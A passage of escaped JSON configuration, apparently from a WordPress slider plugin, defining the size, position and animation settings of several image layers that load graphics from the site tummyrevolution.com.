\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Go vegan\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide3-graphic2.png\",\"imageId\":2521},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":502,\"originalHeight\":369,\"aspectRatio\":{\"d\":{\"v\":1.3604336043360434},\"n\":{\"v\":1.3604336043360434},\"t\":{\"v\":1.3604336043360434},\"m\":{\"v\":1.3604336043360434}}},\"position\":{\"x\":{\"d\":{\"v\":\"-11px\",\"e\":true},\"n\":{\"v\":\"-11px\"},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"15px\"},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":920,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Image 8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"389px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-228px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":400,\"start\":3020,\"startRelative\":740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 9\",\"alias\":\"Image 9\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic6.png\",\"imageId\":2522},\"size\":{\"width\":{\"d\":{\"v\":\"91px\",\"e\":true},\"n\":{\"v\":\"91px\",\"e\":true},\"t\":{\"v\":\"91px\"},\"m\":{\"v\":\"91px\"}},\"height\":{\"d\":{\"v\":\"83px\",\"e\":true},\"n\":{\"v\":\"83px\",\"e\":true},\"t\":{\"v\":\"83px\"},\"m\":{\"v\":\"83px\"}},\"originalWidth\":91,\"originalHeight\":83,\"aspectRatio\":{\"d\":{\"v\":1.0963855421686748},\"n\":{\"v\":1.0963855421686748},\"t\":{\"v\":1.0963855421686748},\"m\":{\"v\":1.0963855421686748}}},\"position\":{\"x\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"20px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"264px\",\"e\":true},\"n\":{\"v\":\"224px\",\"e\":true},\"t\":{\"v\":\"224px\"},\"m\":{\"v\":\"104px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":340},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1190,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1190,\"start\":340,\"startRelative\":340},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"Image 10\",\"alias\":\"\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic2.png\",\"imageId\":2592},\"size\":{\"width\":{\"d\":{\"v\":\"174px\",\"e\":true},\"n\":{\"v\":\"97px\",\"e\":true},\"t\":{\"v\":\"97px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"81px\",\"e\":true},\"t\":{\"v\":\"81px\",\"e\":true},\"m\":{\"v\":\"79px\",\"e\":true}},\"originalWidth\":174,\"originalHeight\":145,\"aspectRatio\":{\"d\":{\"v\":1.2},\"n\":{\"v\":1.2},\"t\":{\"v\":1.2},\"m\":{\"v\":1.2}}},\"position\":{\"x\":{\"d\":{\"v\":\"1315px\",\"e\":true},\"n\":{\"v\":\"1002px\",\"e\":true},\"t\":{\"v\":\"390px\",\"e\":true},\"m\":{\"v\":\"175px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"847px\",\"e\":true},\"n\":{\"v\":\"676px\",\"e\":true},\"t\":{\"v\":\"793px\",\"e\":true},\"m\":{\"v\":\"143px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":280},{\"id\":\"frame_999\",\"start\":3020}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":\"150deg\",\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":280,\"startRelative\":280},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":280,\"startRelative\":280},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3020,\"startRelative\":1740,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"14\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic1.png\",\"imageId\":2518},\"size\":{\"width\":{\"d\":{\"v\":\"324px\",\"e\":true},\"n\":{\"v\":\"223px\",\"e\":true},\"t\":{\"v\":\"223px\"},\"m\":{\"v\":\"155px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"203px\",\"e\":true},\"n\":{\"v\":\"140px\",\"e\":true},\"t\":{\"v\":\"140px\"},\"m\":{\"v\":\"97px\",\"e\":true}},\"originalWidth\":324,\"originalHeight\":203,\"aspectRatio\":{\"d\":{\"v\":1.5960591133004927},\"n\":{\"v\":1.5960591133004927},\"t\":{\"v\":1.5960591133004927},\"m\":{\"v\":1.5960591133004927}}},\"position\":{\"x\":{\"d\":{\"v\":\"730px\",\"e\":true},\"n\":{\"v\":\"484px\",\"e\":true},\"t\":{\"v\":\"226px\",\"e\":true},\"m\":{\"v\":\"144px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"456px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"380px\",\"e\":true},\"m\":{\"v\":\"225px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{